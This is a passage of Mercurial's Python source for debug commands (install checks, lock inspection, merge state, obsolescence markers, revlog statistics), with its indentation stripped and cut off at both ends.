(fd, name) = pycompat.mkstemp(prefix="hg-debuginstall-")
f = os.fdopen(fd, r"wb")
f.write(contents)
f.close()
return name
problems = 0
fm = ui.formatter('debuginstall', opts)
fm.startitem()
# encoding
fm.write('encoding', _("checking encoding (%s)...\n"), encoding.encoding)
err = None
try:
codecs.lookup(pycompat.sysstr(encoding.encoding))
except LookupError as inst:
err = stringutil.forcebytestr(inst)
problems += 1
fm.condwrite(err, 'encodingerror', _(" %s\n"
" (check that your locale is properly set)\n"), err)
# Python
fm.write('pythonexe', _("checking Python executable (%s)\n"),
pycompat.sysexecutable)
fm.write('pythonver', _("checking Python version (%s)\n"),
("%d.%d.%d" % sys.version_info[:3]))
fm.write('pythonlib', _("checking Python lib (%s)...\n"),
os.path.dirname(pycompat.fsencode(os.__file__)))
security = set(sslutil.supportedprotocols)
if sslutil.hassni:
security.add('sni')
fm.write('pythonsecurity', _("checking Python security support (%s)\n"),
fm.formatlist(sorted(security), name='protocol',
fmt='%s', sep=','))
# These are warnings, not errors. So don't increment problem count. This
# may change in the future.
if 'tls1.2' not in security:
fm.plain(_(' TLS 1.2 not supported by Python install; '
'network connections lack modern security\n'))
if 'sni' not in security:
fm.plain(_(' SNI not supported by Python install; may have '
'connectivity issues with some servers\n'))
# TODO print CA cert info
# hg version
hgver = util.version()
fm.write('hgver', _("checking Mercurial version (%s)\n"),
hgver.split('+')[0])
fm.write('hgverextra', _("checking Mercurial custom build (%s)\n"),
'+'.join(hgver.split('+')[1:]))
# compiled modules
fm.write('hgmodulepolicy', _("checking module policy (%s)\n"),
policy.policy)
fm.write('hgmodules', _("checking installed modules (%s)...\n"),
os.path.dirname(pycompat.fsencode(__file__)))
if policy.policy in ('c', 'allow'):
err = None
try:
from .cext import (
base85,
bdiff,
mpatch,
osutil,
)
dir(bdiff), dir(mpatch), dir(base85), dir(osutil) # quiet pyflakes
except Exception as inst:
err = stringutil.forcebytestr(inst)
problems += 1
fm.condwrite(err, 'extensionserror', " %s\n", err)
compengines = util.compengines._engines.values()
fm.write('compengines', _('checking registered compression engines (%s)\n'),
fm.formatlist(sorted(e.name() for e in compengines),
name='compengine', fmt='%s', sep=', '))
fm.write('compenginesavail', _('checking available compression engines '
'(%s)\n'),
fm.formatlist(sorted(e.name() for e in compengines
if e.available()),
name='compengine', fmt='%s', sep=', '))
wirecompengines = util.compengines.supportedwireengines(util.SERVERROLE)
fm.write('compenginesserver', _('checking available compression engines '
'for wire protocol (%s)\n'),
fm.formatlist([e.name() for e in wirecompengines
if e.wireprotosupport()],
name='compengine', fmt='%s', sep=', '))
re2 = 'missing'
if util._re2:
re2 = 'available'
fm.plain(_('checking "re2" regexp engine (%s)\n') % re2)
fm.data(re2=bool(util._re2))
# templates
p = templater.templatepaths()
fm.write('templatedirs', 'checking templates (%s)...\n', ' '.join(p))
fm.condwrite(not p, '', _(" no template directories found\n"))
if p:
m = templater.templatepath("map-cmdline.default")
if m:
# template found, check if it is working
err = None
try:
templater.templater.frommapfile(m)
except Exception as inst:
err = stringutil.forcebytestr(inst)
p = None
fm.condwrite(err, 'defaulttemplateerror', " %s\n", err)
else:
p = None
fm.condwrite(p, 'defaulttemplate',
_("checking default template (%s)\n"), m)
fm.condwrite(not m, 'defaulttemplatenotfound',
_(" template '%s' not found\n"), "default")
if not p:
problems += 1
fm.condwrite(not p, '',
_(" (templates seem to have been installed incorrectly)\n"))
# editor
editor = ui.geteditor()
editor = util.expandpath(editor)
editorbin = procutil.shellsplit(editor)[0]
fm.write('editor', _("checking commit editor... (%s)\n"), editorbin)
cmdpath = procutil.findexe(editorbin)
fm.condwrite(not cmdpath and editor == 'vi', 'vinotfound',
_(" No commit editor set and can't find %s in PATH\n"
" (specify a commit editor in your configuration"
" file)\n"), not cmdpath and editor == 'vi' and editorbin)
fm.condwrite(not cmdpath and editor != 'vi', 'editornotfound',
_(" Can't find editor '%s' in PATH\n"
" (specify a commit editor in your configuration"
" file)\n"), not cmdpath and editorbin)
if not cmdpath and editor != 'vi':
problems += 1
# check username
username = None
err = None
try:
username = ui.username()
except error.Abort as e:
err = stringutil.forcebytestr(e)
problems += 1
fm.condwrite(username, 'username', _("checking username (%s)\n"), username)
fm.condwrite(err, 'usernameerror', _("checking username...\n %s\n"
" (specify a username in your configuration file)\n"), err)
fm.condwrite(not problems, '',
_("no problems detected\n"))
if not problems:
fm.data(problems=problems)
fm.condwrite(problems, 'problems',
_("%d problems detected,"
" please check your install!\n"), problems)
fm.end()
return problems
@command('debugknown', [], _('REPO ID...'), norepo=True)
def debugknown(ui, repopath, *ids, **opts):
"""test whether node ids are known to a repo
Every ID must be a full-length hex node id string. Returns a list of 0s
and 1s indicating unknown/known.
"""
opts = pycompat.byteskwargs(opts)
repo = hg.peer(ui, opts, repopath)
if not repo.capable('known'):
raise error.Abort("known() not supported by target repository")
flags = repo.known([bin(s) for s in ids])
ui.write("%s\n" % ("".join([f and "1" or "0" for f in flags])))
@command('debuglabelcomplete', [], _('LABEL...'))
def debuglabelcomplete(ui, repo, *args):
'''backwards compatibility with old bash completion scripts (DEPRECATED)'''
debugnamecomplete(ui, repo, *args)
@command('debuglocks',
[('L', 'force-lock', None, _('free the store lock (DANGEROUS)')),
('W', 'force-wlock', None,
_('free the working state lock (DANGEROUS)')),
('s', 'set-lock', None, _('set the store lock until stopped')),
('S', 'set-wlock', None,
_('set the working state lock until stopped'))],
_('[OPTION]...'))
def debuglocks(ui, repo, **opts):
"""show or modify state of locks
By default, this command will show which locks are held. This
includes the user and process holding the lock, the amount of time
the lock has been held, and the machine name where the process is
running if it's not local.
Locks protect the integrity of Mercurial's data, so should be
treated with care. System crashes or other interruptions may cause
locks to not be properly released, though Mercurial will usually
detect and remove such stale locks automatically.
However, detecting stale locks may not always be possible (for
instance, on a shared filesystem). Removing locks may also be
blocked by filesystem permissions.
Setting a lock will prevent other commands from changing the data.
The command will wait until an interruption (SIGINT, SIGTERM, ...) occurs.
The set locks are removed when the command exits.
Returns 0 if no locks are held.
"""
if opts.get(r'force_lock'):
repo.svfs.unlink('lock')
if opts.get(r'force_wlock'):
repo.vfs.unlink('wlock')
if opts.get(r'force_lock') or opts.get(r'force_wlock'):
return 0
locks = []
try:
if opts.get(r'set_wlock'):
try:
locks.append(repo.wlock(False))
except error.LockHeld:
raise error.Abort(_('wlock is already held'))
if opts.get(r'set_lock'):
try:
locks.append(repo.lock(False))
except error.LockHeld:
raise error.Abort(_('lock is already held'))
if len(locks):
ui.promptchoice(_("ready to release the lock (y)? $$ &Yes"))
return 0
finally:
release(*locks)
now = time.time()
held = 0
def report(vfs, name, method):
# this causes stale locks to get reaped for more accurate reporting
try:
l = method(False)
except error.LockHeld:
l = None
if l:
l.release()
else:
try:
st = vfs.lstat(name)
age = now - st[stat.ST_MTIME]
user = util.username(st.st_uid)
locker = vfs.readlock(name)
if ":" in locker:
host, pid = locker.split(':')
if host == socket.gethostname():
locker = 'user %s, process %s' % (user or b'None', pid)
else:
locker = 'user %s, process %s, host %s' \
% (user or b'None', pid, host)
ui.write(("%-6s %s (%ds)\n") % (name + ":", locker, age))
return 1
except OSError as e:
if e.errno != errno.ENOENT:
raise
ui.write(("%-6s free\n") % (name + ":"))
return 0
held += report(repo.svfs, "lock", repo.lock)
held += report(repo.vfs, "wlock", repo.wlock)
return held
@command('debugmanifestfulltextcache', [
('', 'clear', False, _('clear the cache')),
('a', 'add', '', _('add the given manifest node to the cache'),
_('NODE'))
], '')
def debugmanifestfulltextcache(ui, repo, add=None, **opts):
"""show, clear or amend the contents of the manifest fulltext cache"""
with repo.lock():
r = repo.manifestlog.getstorage(b'')
try:
cache = r._fulltextcache
except AttributeError:
ui.warn(_(
"Current revlog implementation doesn't appear to have a "
'manifest fulltext cache\n'))
return
if opts.get(r'clear'):
cache.clear()
if add:
try:
manifest = repo.manifestlog[r.lookup(add)]
except error.LookupError as e:
raise error.Abort(e, hint="Check your manifest node id")
manifest.read() # stores revisision in cache too
if not len(cache):
ui.write(_('Cache empty'))
else:
ui.write(
_('Cache contains %d manifest entries, in order of most to '
'least recent:\n') % (len(cache),))
totalsize = 0
for nodeid in cache:
# Use cache.get to not update the LRU order
data = cache.get(nodeid)
size = len(data)
totalsize += size + 24 # 20 bytes nodeid, 4 bytes size
ui.write(_('id: %s, size %s\n') % (
hex(nodeid), util.bytecount(size)))
ondisk = cache._opener.stat('manifestfulltextcache').st_size
ui.write(
_('Total cache data size %s, on-disk %s\n') % (
util.bytecount(totalsize), util.bytecount(ondisk))
)
@command('debugmergestate', [], '')
def debugmergestate(ui, repo, *args):
"""print merge state
Use --verbose to print out information about whether v1 or v2 merge state
was chosen."""
def _hashornull(h):
if h == nullhex:
return 'null'
else:
return h
def printrecords(version):
ui.write(('* version %d records\n') % version)
if version == 1:
records = v1records
else:
records = v2records
for rtype, record in records:
# pretty print some record types
if rtype == 'L':
ui.write(('local: %s\n') % record)
elif rtype == 'O':
ui.write(('other: %s\n') % record)
elif rtype == 'm':
driver, mdstate = record.split('\0', 1)
ui.write(('merge driver: %s (state "%s")\n')
% (driver, mdstate))
elif rtype in 'FDC':
r = record.split('\0')
f, state, hash, lfile, afile, anode, ofile = r[0:7]
if version == 1:
onode = 'not stored in v1 format'
flags = r[7]
else:
onode, flags = r[7:9]
ui.write(('file: %s (record type "%s", state "%s", hash %s)\n')
% (f, rtype, state, _hashornull(hash)))
ui.write((' local path: %s (flags "%s")\n') % (lfile, flags))
ui.write((' ancestor path: %s (node %s)\n')
% (afile, _hashornull(anode)))
ui.write((' other path: %s (node %s)\n')
% (ofile, _hashornull(onode)))
elif rtype == 'f':
filename, rawextras = record.split('\0', 1)
extras = rawextras.split('\0')
i = 0
extrastrings = []
while i < len(extras):
extrastrings.append('%s = %s' % (extras[i], extras[i + 1]))
i += 2
ui.write(('file extras: %s (%s)\n')
% (filename, ', '.join(extrastrings)))
elif rtype == 'l':
labels = record.split('\0', 2)
labels = [l for l in labels if len(l) > 0]
ui.write(('labels:\n'))
ui.write((' local: %s\n' % labels[0]))
ui.write((' other: %s\n' % labels[1]))
if len(labels) > 2:
ui.write((' base: %s\n' % labels[2]))
else:
ui.write(('unrecognized entry: %s\t%s\n')
% (rtype, record.replace('\0', '\t')))
# Avoid mergestate.read() since it may raise an exception for unsupported
# merge state records. We shouldn't be doing this, but this is OK since this
# command is pretty low-level.
ms = mergemod.mergestate(repo)
# sort so that reasonable information is on top
v1records = ms._readrecordsv1()
v2records = ms._readrecordsv2()
order = 'LOml'
def key(r):
idx = order.find(r[0])
if idx == -1:
return (1, r[1])
else:
return (0, idx)
v1records.sort(key=key)
v2records.sort(key=key)
if not v1records and not v2records:
ui.write(('no merge state found\n'))
elif not v2records:
ui.note(('no version 2 merge state\n'))
printrecords(1)
elif ms._v1v2match(v1records, v2records):
ui.note(('v1 and v2 states match: using v2\n'))
printrecords(2)
else:
ui.note(('v1 and v2 states mismatch: using v1\n'))
printrecords(1)
if ui.verbose:
printrecords(2)
@command('debugnamecomplete', [], _('NAME...'))
def debugnamecomplete(ui, repo, *args):
'''complete "names" - tags, open branch names, bookmark names'''
names = set()
# since we previously only listed open branches, we will handle that
# specially (after this for loop)
for name, ns in repo.names.iteritems():
if name != 'branches':
names.update(ns.listnames(repo))
names.update(tag for (tag, heads, tip, closed)
in repo.branchmap().iterbranches() if not closed)
completions = set()
if not args:
args = ['']
for a in args:
completions.update(n for n in names if n.startswith(a))
ui.write('\n'.join(sorted(completions)))
ui.write('\n')
@command('debugobsolete',
[('', 'flags', 0, _('markers flag')),
('', 'record-parents', False,
_('record parent information for the precursor')),
('r', 'rev', [], _('display markers relevant to REV')),
('', 'exclusive', False, _('restrict display to markers only '
'relevant to REV')),
('', 'index', False, _('display index of the marker')),
('', 'delete', [], _('delete markers specified by indices')),
] + cmdutil.commitopts2 + cmdutil.formatteropts,
_('[OBSOLETED [REPLACEMENT ...]]'))
def debugobsolete(ui, repo, precursor=None, *successors, **opts):
"""create arbitrary obsolete marker
With no arguments, displays the list of obsolescence markers."""
opts = pycompat.byteskwargs(opts)
def parsenodeid(s):
try:
# We do not use revsingle/revrange functions here to accept
# arbitrary node identifiers, possibly not present in the
# local repository.
n = bin(s)
if len(n) != len(nullid):
raise TypeError()
return n
except TypeError:
raise error.Abort('changeset references must be full hexadecimal '
'node identifiers')
if opts.get('delete'):
indices = []
for v in opts.get('delete'):
try:
indices.append(int(v))
except ValueError:
raise error.Abort(_('invalid index value: %r') % v,
hint=_('use integers for indices'))
if repo.currenttransaction():
raise error.Abort(_('cannot delete obsmarkers in the middle '
'of transaction.'))
with repo.lock():
n = repair.deleteobsmarkers(repo.obsstore, indices)
ui.write(_('deleted %i obsolescence markers\n') % n)
return
if precursor is not None:
if opts['rev']:
raise error.Abort('cannot select revision when creating marker')
metadata = {}
metadata['user'] = encoding.fromlocal(opts['user'] or ui.username())
succs = tuple(parsenodeid(succ) for succ in successors)
l = repo.lock()
try:
tr = repo.transaction('debugobsolete')
try:
date = opts.get('date')
if date:
date = dateutil.parsedate(date)
else:
date = None
prec = parsenodeid(precursor)
parents = None
if opts['record_parents']:
if prec not in repo.unfiltered():
raise error.Abort('cannot used --record-parents on '
'unknown changesets')
parents = repo.unfiltered()[prec].parents()
parents = tuple(p.node() for p in parents)
repo.obsstore.create(tr, prec, succs, opts['flags'],
parents=parents, date=date,
metadata=metadata, ui=ui)
tr.close()
except ValueError as exc:
raise error.Abort(_('bad obsmarker input: %s') %
pycompat.bytestr(exc))
finally:
tr.release()
finally:
l.release()
else:
if opts['rev']:
revs = scmutil.revrange(repo, opts['rev'])
nodes = [repo[r].node() for r in revs]
markers = list(obsutil.getmarkers(repo, nodes=nodes,
exclusive=opts['exclusive']))
markers.sort(key=lambda x: x._data)
else:
markers = obsutil.getmarkers(repo)
markerstoiter = markers
isrelevant = lambda m: True
if opts.get('rev') and opts.get('index'):
markerstoiter = obsutil.getmarkers(repo)
markerset = set(markers)
isrelevant = lambda m: m in markerset
fm = ui.formatter('debugobsolete', opts)
for i, m in enumerate(markerstoiter):
if not isrelevant(m):
# marker can be irrelevant when we're iterating over a set
# of markers (markerstoiter) which is bigger than the set
# of markers we want to display (markers)
# this can happen if both --index and --rev options are
# provided and thus we need to iterate over all of the markers
# to get the correct indices, but only display the ones that
# are relevant to --rev value
continue
fm.startitem()
ind = i if opts.get('index') else None
cmdutil.showmarker(fm, m, index=ind)
fm.end()
@command('debugpathcomplete',
[('f', 'full', None, _('complete an entire path')),
('n', 'normal', None, _('show only normal files')),
('a', 'added', None, _('show only added files')),
('r', 'removed', None, _('show only removed files'))],
_('FILESPEC...'))
def debugpathcomplete(ui, repo, *specs, **opts):
'''complete part or all of a tracked path
This command supports shells that offer path name completion. It
currently completes only files already known to the dirstate.
Completion extends only to the next path segment unless
--full is specified, in which case entire paths are used.'''
def complete(path, acceptable):
dirstate = repo.dirstate
spec = os.path.normpath(os.path.join(encoding.getcwd(), path))
rootdir = repo.root + pycompat.ossep
if spec != repo.root and not spec.startswith(rootdir):
return [], []
if os.path.isdir(spec):
spec += '/'
spec = spec[len(rootdir):]
fixpaths = pycompat.ossep != '/'
if fixpaths:
spec = spec.replace(pycompat.ossep, '/')
speclen = len(spec)
fullpaths = opts[r'full']
files, dirs = set(), set()
adddir, addfile = dirs.add, files.add
for f, st in dirstate.iteritems():
if f.startswith(spec) and st[0] in acceptable:
if fixpaths:
f = f.replace('/', pycompat.ossep)
if fullpaths:
addfile(f)
continue
s = f.find(pycompat.ossep, speclen)
if s >= 0:
adddir(f[:s])
else:
addfile(f)
return files, dirs
acceptable = ''
if opts[r'normal']:
acceptable += 'nm'
if opts[r'added']:
acceptable += 'a'
if opts[r'removed']:
acceptable += 'r'
cwd = repo.getcwd()
if not specs:
specs = ['.']
files, dirs = set(), set()
for spec in specs:
f, d = complete(spec, acceptable or 'nmar')
files.update(f)
dirs.update(d)
files.update(dirs)
ui.write('\n'.join(repo.pathto(p, cwd) for p in sorted(files)))
ui.write('\n')
@command('debugpeer', [], _('PATH'), norepo=True)
def debugpeer(ui, path):
"""establish a connection to a peer repository"""
# Always enable peer request logging. Requires --debug to display
# though.
overrides = {
('devel', 'debug.peer-request'): True,
}
with ui.configoverride(overrides):
peer = hg.peer(ui, {}, path)
local = peer.local() is not None
canpush = peer.canpush()
ui.write(_('url: %s\n') % peer.url())
ui.write(_('local: %s\n') % (_('yes') if local else _('no')))
ui.write(_('pushable: %s\n') % (_('yes') if canpush else _('no')))
@command('debugpickmergetool',
[('r', 'rev', '', _('check for files in this revision'), _('REV')),
('', 'changedelete', None, _('emulate merging change and delete')),
] + cmdutil.walkopts + cmdutil.mergetoolopts,
_('[PATTERN]...'),
inferrepo=True)
def debugpickmergetool(ui, repo, *pats, **opts):
"""examine which merge tool is chosen for specified file
As described in :hg:`help merge-tools`, Mercurial examines
configurations below in this order to decide which merge tool is
chosen for specified file.
1. ``--tool`` option
2. ``HGMERGE`` environment variable
3. configurations in ``merge-patterns`` section
4. configuration of ``ui.merge``
5. configurations in ``merge-tools`` section
6. ``hgmerge`` tool (for historical reason only)
7. default tool for fallback (``:merge`` or ``:prompt``)
This command writes out examination result in the style below::
FILE = MERGETOOL
By default, all files known in the first parent context of the
working directory are examined. Use file patterns and/or -I/-X
options to limit target files. -r/--rev is also useful to examine
files in another context without actual updating to it.
With --debug, this command shows warning messages while matching
against ``merge-patterns`` and so on, too. It is recommended to
use this option with explicit file patterns and/or -I/-X options,
because this option increases amount of output per file according
to configurations in hgrc.
With -v/--verbose, this command shows configurations below at
first (only if specified).
- ``--tool`` option
- ``HGMERGE`` environment variable
- configuration of ``ui.merge``
If merge tool is chosen before matching against
``merge-patterns``, this command can't show any helpful
information, even with --debug. In such case, information above is
useful to know why a merge tool is chosen.
"""
opts = pycompat.byteskwargs(opts)
overrides = {}
if opts['tool']:
overrides[('ui', 'forcemerge')] = opts['tool']
ui.note(('with --tool %r\n') % (pycompat.bytestr(opts['tool'])))
with ui.configoverride(overrides, 'debugmergepatterns'):
hgmerge = encoding.environ.get("HGMERGE")
if hgmerge is not None:
ui.note(('with HGMERGE=%r\n') % (pycompat.bytestr(hgmerge)))
uimerge = ui.config("ui", "merge")
if uimerge:
ui.note(('with ui.merge=%r\n') % (pycompat.bytestr(uimerge)))
ctx = scmutil.revsingle(repo, opts.get('rev'))
m = scmutil.match(ctx, pats, opts)
changedelete = opts['changedelete']
for path in ctx.walk(m):
fctx = ctx[path]
try:
if not ui.debugflag:
ui.pushbuffer(error=True)
tool, toolpath = filemerge._picktool(repo, ui, path,
fctx.isbinary(),
'l' in fctx.flags(),
changedelete)
finally:
if not ui.debugflag:
ui.popbuffer()
ui.write(('%s = %s\n') % (path, tool))
@command('debugpushkey', [], _('REPO NAMESPACE [KEY OLD NEW]'), norepo=True)
def debugpushkey(ui, repopath, namespace, *keyinfo, **opts):
'''access the pushkey key/value protocol
With two args, list the keys in the given namespace.
With five args, set a key to new if it currently is set to old.
Reports success or failure.
'''
target = hg.peer(ui, {}, repopath)
if keyinfo:
key, old, new = keyinfo
with target.commandexecutor() as e:
r = e.callcommand('pushkey', {
'namespace': namespace,
'key': key,
'old': old,
'new': new,
}).result()
ui.status(pycompat.bytestr(r) + '\n')
return not r
else:
for k, v in sorted(target.listkeys(namespace).iteritems()):
ui.write("%s\t%s\n" % (stringutil.escapestr(k),
stringutil.escapestr(v)))
@command('debugpvec', [], _('A B'))
def debugpvec(ui, repo, a, b=None):
ca = scmutil.revsingle(repo, a)
cb = scmutil.revsingle(repo, b)
pa = pvec.ctxpvec(ca)
pb = pvec.ctxpvec(cb)
if pa == pb:
rel = "="
elif pa > pb:
rel = ">"
elif pa < pb:
rel = "<"
elif pa | pb:
rel = "|"
ui.write(_("a: %s\n") % pa)
ui.write(_("b: %s\n") % pb)
ui.write(_("depth(a): %d depth(b): %d\n") % (pa._depth, pb._depth))
ui.write(_("delta: %d hdist: %d distance: %d relation: %s\n") %
(abs(pa._depth - pb._depth), pvec._hamming(pa._vec, pb._vec),
pa.distance(pb), rel))
@command('debugrebuilddirstate|debugrebuildstate',
[('r', 'rev', '', _('revision to rebuild to'), _('REV')),
('', 'minimal', None, _('only rebuild files that are inconsistent with '
'the working copy parent')),
],
_('[-r REV]'))
def debugrebuilddirstate(ui, repo, rev, **opts):
"""rebuild the dirstate as it would look like for the given revision
If no revision is specified the first current parent will be used.
The dirstate will be set to the files of the given revision.
The actual working directory content or existing dirstate
information such as adds or removes is not considered.
``minimal`` will only rebuild the dirstate status for files that claim to be
tracked but are not in the parent manifest, or that exist in the parent
manifest but are not in the dirstate. It will not change adds, removes, or
modified files that are in the working copy parent.
One use of this command is to make the next :hg:`status` invocation
check the actual file content.
"""
ctx = scmutil.revsingle(repo, rev)
with repo.wlock():
dirstate = repo.dirstate
changedfiles = None
# See command doc for what minimal does.
if opts.get(r'minimal'):
manifestfiles = set(ctx.manifest().keys())
dirstatefiles = set(dirstate)
manifestonly = manifestfiles - dirstatefiles
dsonly = dirstatefiles - manifestfiles
dsnotadded = set(f for f in dsonly if dirstate[f] != 'a')
changedfiles = manifestonly | dsnotadded
dirstate.rebuild(ctx.node(), ctx.manifest(), changedfiles)
@command('debugrebuildfncache', [], '')
def debugrebuildfncache(ui, repo):
"""rebuild the fncache file"""
repair.rebuildfncache(ui, repo)
@command('debugrename',
[('r', 'rev', '', _('revision to debug'), _('REV'))],
_('[-r REV] FILE'))
def debugrename(ui, repo, file1, *pats, **opts):
"""dump rename information"""
opts = pycompat.byteskwargs(opts)
ctx = scmutil.revsingle(repo, opts.get('rev'))
m = scmutil.match(ctx, (file1,) + pats, opts)
for abs in ctx.walk(m):
fctx = ctx[abs]
o = fctx.filelog().renamed(fctx.filenode())
rel = m.rel(abs)
if o:
ui.write(_("%s renamed from %s:%s\n") % (rel, o[0], hex(o[1])))
else:
ui.write(_("%s not renamed\n") % rel)
@command('debugrevlog', cmdutil.debugrevlogopts +
[('d', 'dump', False, _('dump index data'))],
_('-c|-m|FILE'),
optionalrepo=True)
def debugrevlog(ui, repo, file_=None, **opts):
"""show data and statistics about a revlog"""
opts = pycompat.byteskwargs(opts)
r = cmdutil.openrevlog(repo, 'debugrevlog', file_, opts)
if opts.get("dump"):
numrevs = len(r)
ui.write(("# rev p1rev p2rev start end deltastart base p1 p2"
" rawsize totalsize compression heads chainlen\n"))
ts = 0
heads = set()
for rev in pycompat.xrange(numrevs):
dbase = r.deltaparent(rev)
if dbase == -1:
dbase = rev
cbase = r.chainbase(rev)
clen = r.chainlen(rev)
p1, p2 = r.parentrevs(rev)
rs = r.rawsize(rev)
ts = ts + rs
heads -= set(r.parentrevs(rev))
heads.add(rev)
try:
compression = ts / r.end(rev)
except ZeroDivisionError:
compression = 0
ui.write("%5d %5d %5d %5d %5d %10d %4d %4d %4d %7d %9d "
"%11d %5d %8d\n" %
(rev, p1, p2, r.start(rev), r.end(rev),
r.start(dbase), r.start(cbase),
r.start(p1), r.start(p2),
rs, ts, compression, len(heads), clen))
return 0
v = r.version
format = v & 0xFFFF
flags = []
gdelta = False
if v & revlog.FLAG_INLINE_DATA:
flags.append('inline')
if v & revlog.FLAG_GENERALDELTA:
gdelta = True
flags.append('generaldelta')
if not flags:
flags = ['(none)']
### tracks merge vs single parent
nummerges = 0
### tracks ways the "delta" are build
# nodelta
numempty = 0
numemptytext = 0
numemptydelta = 0
# full file content
numfull = 0
# intermediate snapshot against a prior snapshot
numsemi = 0
# snapshot count per depth
numsnapdepth = collections.defaultdict(lambda: 0)
# delta against previous revision
numprev = 0
# delta against first or second parent (not prev)
nump1 = 0
nump2 = 0
# delta against neither prev nor parents
numother = 0
# delta against prev that are also first or second parent
# (details of `numprev`)
nump1prev = 0
nump2prev = 0
# data about delta chain of each revs
chainlengths = []
chainbases = []
chainspans = []
# data about each revision
datasize = [None, 0, 0]
fullsize = [None, 0, 0]
semisize = [None, 0, 0]
# snapshot count per depth
snapsizedepth = collections.defaultdict(lambda: [None, 0, 0])
deltasize = [None, 0, 0]
chunktypecounts = {}
chunktypesizes = {}
def addsize(size, l):
if l[0] is None or size < l[0]:
l[0] = size
if size > l[1]:
l[1] = size
l[2] += size
numrevs = len(r)
for rev in pycompat.xrange(numrevs):
p1, p2 = r.parentrevs(rev)
delta = r.deltaparent(rev)
if format > 0:
addsize(r.rawsize(rev), datasize)
if p2 != nullrev:
nummerges += 1
size = r.length(rev)
if delta == nullrev:
chainlengths.append(0)
chainbases.append(r.start(rev))
chainspans.append(size)
if size == 0:
numempty += 1
numemptytext += 1
else:
numfull += 1
numsnapdepth[0] += 1
addsize(size, fullsize)
addsize(size, snapsizedepth[0])
else:
chainlengths.append(chainlengths[delta] + 1)
baseaddr = chainbases[delta]
revaddr = r.start(rev)
chainbases.append(baseaddr)
chainspans.append((revaddr - baseaddr) + size)
if size == 0:
numempty += 1
numemptydelta += 1
elif r.issnapshot(rev):
addsize(size, semisize)
numsemi += 1
depth = r.snapshotdepth(rev)
numsnapdepth[depth] += 1
addsize(size, snapsizedepth[depth])
else:
addsize(size, deltasize)
if delta == rev - 1:
numprev += 1
if delta == p1:
nump1prev += 1
elif delta == p2:
nump2prev += 1
elif delta == p1:
nump1 += 1
elif delta == p2:
nump2 += 1
elif delta != nullrev:
numother += 1
# Obtain data on the raw chunks in the revlog.
if util.safehasattr(r, '_getsegmentforrevs'):
segment = r._getsegmentforrevs(rev, rev)[1]
else:
segment = r._revlog._getsegmentforrevs(rev, rev)[1]
if segment:
chunktype = bytes(segment[0:1])
else:
chunktype = 'empty'
if chunktype not in chunktypecounts:
chunktypecounts[chunktype] = 0
chunktypesizes[chunktype] = 0
chunktypecounts[chunktype] += 1
chunktypesizes[chunktype] += size
# Adjust size min value for empty cases
for size in (datasize, fullsize, semisize, deltasize):
if size[0] is None:
size[0] = 0
numdeltas = numrevs - numfull - numempty - numsemi
numoprev = numprev - nump1prev - nump2prev
totalrawsize = datasize[2]
datasize[2] /= numrevs
fulltotal = fullsize[2]
fullsize[2] /= numfull
semitotal = semisize[2]
snaptotal = {}
if numsemi > 0:
semisize[2] /= numsemi
for depth in snapsizedepth:
snaptotal[depth] = snapsizedepth[depth][2]
snapsizedepth[depth][2] /= numsnapdepth[depth]
deltatotal = deltasize[2]
if numdeltas > 0:
deltasize[2] /= numdeltas
totalsize = fulltotal + semitotal + deltatotal
avgchainlen = sum(chainlengths) / numrevs
maxchainlen = max(chainlengths)
maxchainspan = max(chainspans)
compratio = 1
if totalsize:
compratio = totalrawsize / totalsize
basedfmtstr = '%%%dd\n'
basepcfmtstr = '%%%dd %s(%%5.2f%%%%)\n'
def dfmtstr(max):
return basedfmtstr % len(str(max))
def pcfmtstr(max, padding=0):
return basepcfmtstr % (len(str(max)), ' ' * padding)
def pcfmt(value, total):
if total:
return (value, 100 * float(value) / total)
else:
return value, 100.0
ui.write(('format : %d\n') % format)
ui.write(('flags : %s\n') % ', '.join(flags))
ui.write('\n')
fmt = pcfmtstr(totalsize)
fmt2 = dfmtstr(totalsize)
ui.write(('revisions : ') + fmt2 % numrevs)
ui.write((' merges : ') + fmt % pcfmt(nummerges, numrevs))
ui.write((' normal : ') + fmt % pcfmt(numrevs - nummerges, numrevs))
ui.write(('revisions : ') + fmt2 % numrevs)
ui.write((' empty : ') + fmt % pcfmt(numempty, numrevs))
ui.write((' text : ')
+ fmt % pcfmt(numemptytext, numemptytext + numemptydelta))
ui.write((' delta : ')
+ fmt % pcfmt(numemptydelta, numemptytext + numemptydelta))
ui.write((' snapshot : ') + fmt % pcfmt(numfull + numsemi, numrevs))
for depth in sorted(numsnapdepth):
ui.write((' lvl-%-3d : ' % depth)
+ fmt % pcfmt(numsnapdepth[depth], numrevs))
ui.write((' deltas : ') + fmt % pcfmt(numdeltas, numrevs))
ui.write(('revision size : ') + fmt2 % totalsize)
ui.write((' snapshot : ')
+ fmt % pcfmt(fulltotal + semitotal, totalsize))
for depth in sorted(numsnapdepth):
ui.write((' lvl-%-3d : ' % depth)
+ fmt % pcfmt(snaptotal[depth], totalsize))
ui.write((' deltas : ') + fmt % pcfmt(deltatotal, totalsize))
def fmtchunktype(chunktype):
if chunktype == 'empty':
return ' %s : ' % chunktype
elif chunktype in pycompat.bytestr(string.ascii_letters):
return ' 0x%s (%s) : ' % (hex(chunktype), chunktype)
else:
return ' 0x%s : ' % hex(chunktype)
ui.write('\n')
ui.write(('chunks : ') + fmt2 % numrevs)
for chunktype in sorted(chunktypecounts):
ui.write(fmtchunktype(chunktype))
ui.write(fmt % pcfmt(chunktypecounts[chunktype], numrevs))
ui.write(('chunks size : ') + fmt2 % totalsize)
for chunktype in sorted(chunktypecounts):
ui.write(fmtchunktype(chunktype))
ui.write(fmt % pcfmt(chunktypesizes[chunktype], totalsize))
ui.write('\n')
fmt = dfmtstr(max(avgchainlen, maxchainlen, maxchainspan, compratio))
ui.write(('avg chain length : ') + fmt % avgchainlen)
ui.write(('max chain length : ') + fmt % maxchainlen)
ui.write(('max chain reach : ') + fmt % maxchainspan)
ui.write(('compression ratio : ') + fmt % compratio)
if format > 0:
ui.write('\n')
ui.write(('uncompressed data size (min/max/avg) : %d / %d / %d\n')
% tuple(datasize))
ui.write(('full revision size (min/max/avg) : %d / %d / %d\n')
% tuple(fullsize))
ui.write(('inter-snapshot size (min/max/avg) : %d / %d / %d\n')
% tuple(semisize))
for depth in sorted(snapsizedepth):
if depth == 0:
continue
ui.write((' level-%-3d (min/max/avg) : %d / %d / %d\n')
% ((depth,) + tuple(snapsizedepth[depth])))
ui.write(('delta size (min/max/avg) : %d / %d / %d\n')
% tuple(deltasize))
if numdeltas > 0:
ui.write('\n')
fmt = pcfmtstr(numdeltas)
fmt2 = pcfmtstr(numdeltas, 4)
